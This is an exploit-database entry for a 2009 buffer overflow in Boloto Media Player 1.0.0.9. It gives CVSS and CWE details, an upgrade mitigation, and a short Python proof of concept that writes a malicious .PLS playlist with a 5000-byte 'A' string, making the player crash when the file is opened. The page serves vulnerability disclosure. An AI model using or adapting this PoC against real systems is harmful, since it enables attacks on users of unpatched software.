header-logo
Suggest Exploit
vendor:
Boloto Media Player
by:
Dr_IDE
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Boloto Media Player
Affected Version From: 1.0.0.9
Affected Version To: 1.0.0.9
Patch Exists: Yes
Related CWE: N/A
CPE: a:boloto_media_player:boloto_media_player:1.0.0.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Boloto Media Player 1.0.0.9 Local (.PLS) Crash PoC

A buffer overflow vulnerability exists in Boloto Media Player 1.0.0.9 when a maliciously crafted .PLS file is added to the playlist and clicked. This could allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Boloto Media Player.
Source

Exploit-DB raw data:

#############################################################################
#
# Boloto Media Player 1.0.0.9 Local (.PLS) Crash PoC
# Found By:	Dr_IDE
# Download:	http://www.tucows.com/preview/602821
# Tested On:	XPSP3
# Note:		It locks hard if you add this file to the playlist and click.
#
#############################################################################

buff = ("\x41" * 5000)

try:
	f1 = open("evil.pls","w");
	f1.write("[playlist]\nNumberOfFiles=3\n\nFile1=http://" + buff);
	f1.close();

except:
	print ("[-] Error. File couldn't be created.");


#[pocoftheday.blogspot.com]

Navigation

Suggest Exploit

Services By CQR